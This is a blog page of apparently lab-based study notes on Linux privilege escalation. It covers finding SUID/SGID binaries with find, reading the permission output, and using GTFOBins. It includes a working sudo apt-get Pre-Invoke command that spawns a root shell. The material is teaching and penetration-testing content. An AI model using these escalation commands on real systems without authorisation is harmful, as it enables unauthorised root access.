Keyboard shortcuts

Press ← or → to navigate between chapters

Press S or / to search in the book

Press ? to show this help

Press Esc to hide this help

🏠 Back to Blog

Linux Privilege Escalation — Special Permissions (SUID/SGID) & GTFOBins

SUID — Set User ID Upon Execution

The setuid bit lets a user execute a program or script with the permissions of the file’s owner (commonly root) rather than their own. It shows up as an s in the owner’s execute position (rws instead of rwx).

rnemeth@htb[/htb]$ find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-xr-x 1 root root 16728 Sep  1 19:06 /home/htb-student/shared_obj_hijack/payroll
-rwsr-xr-x 1 root root 16728 Sep  1 22:05 /home/mrb3n/payroll
-rwSr--r-- 1 root root 0 Aug 31 02:51 /home/cliff.moore/netracer
-rwsr-xr-x 1 root root 40152 Nov 30  2017 /bin/mount
-rwsr-xr-x 1 root root 40128 May 17  2017 /bin/su
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 23376 Jan 18  2016 /usr/bin/pkexec
-rwsr-xr-x 1 root root 136808 Jul  4  2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 54256 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 1588768 Aug 31 00:50 /usr/bin/screen-4.5.0
-rwsr-xr-x 1 root root 94240 Jun  9 14:54 /sbin/mount.nfs

Key point: most of this list is expected (mount, su, passwd, sudo, ping ship with the SUID bit set by default). Look for anything unexpected — non-standard binaries in home directories (payroll, netracer above), unusually-versioned system tools (screen-4.5.0), or standard tools with known SUID-abuse footguns. An uppercase S (as on netracer) means the setuid bit is set but the owner-execute bit itself is not — the file can’t actually be run as-is.

Two approaches once a non-default SUID binary is found:

  1. Reverse engineer it — look for a vulnerability (buffer overflow, insecure file handling, shared library/PATH hijack) that can be exploited to run arbitrary code as the file’s owner.
  2. Check its built-in features — many otherwise-legitimate binaries have documented options (shell-out flags, file read/write flags, exec flags) that can be abused directly if SUID is set. This is exactly what GTFOBins catalogs (below).

SGID — Set Group ID

The setgid bit is the group analog of setuid: it lets a binary run as if the invoking user were a member of the file’s group rather than (or in addition to) its owner. Enumerate SUID and SGID together with -perm -6000 (the combined bit value):

rnemeth@htb[/htb]$ find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null

-rwsr-sr-x 1 root root 85832 Nov 30  2017 /usr/lib/snapd/snap-confine

SGID binaries are enumerated and abused the same way as SUID ones — reverse engineering or built-in feature abuse — just against group privileges instead of owner privileges.


GTFOBins

GTFOBins is a curated catalog of Unix binaries/scripts that ship with (mis)features useful for escaping restricted shells, escalating privileges, spawning shells, uploading/downloading files, and more. Each entry documents exactly which flag or invocation to use and under what condition (SUID, sudo rule, file capability, etc.) it applies.

Example — apt-get abusing its Pre-Invoke hook to spawn a root shell when run via sudo:

rnemeth@htb[/htb]$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh

# id
uid=0(root) gid=0(root) groups=0(root)

Workflow: enumerate SUID/SGID binaries (or sudo -l output, or file capabilities) → cross-reference each binary name against GTFOBins → follow the documented technique for the applicable privilege context (SUID / Sudo / Capabilities / Shell).

Key Takeaways

  • find / -user root -perm -4000 2>/dev/null (SUID) and -perm -6000 (SUID+SGID) are the standard sweep — always compare results against a baseline of “expected” SUID binaries for the distro to spot outliers quickly.
  • An uppercase S/G in the permission string means the special bit is set without the corresponding execute bit — note it, but it can’t be leveraged directly.
  • GTFOBins is the fastest path from “binary name” to “working privesc technique” — memorizing the common entries (sudo, find, vim, less, awk, python, apt/apt-get, nmap) pays off far more than manually re-deriving each abuse from scratch.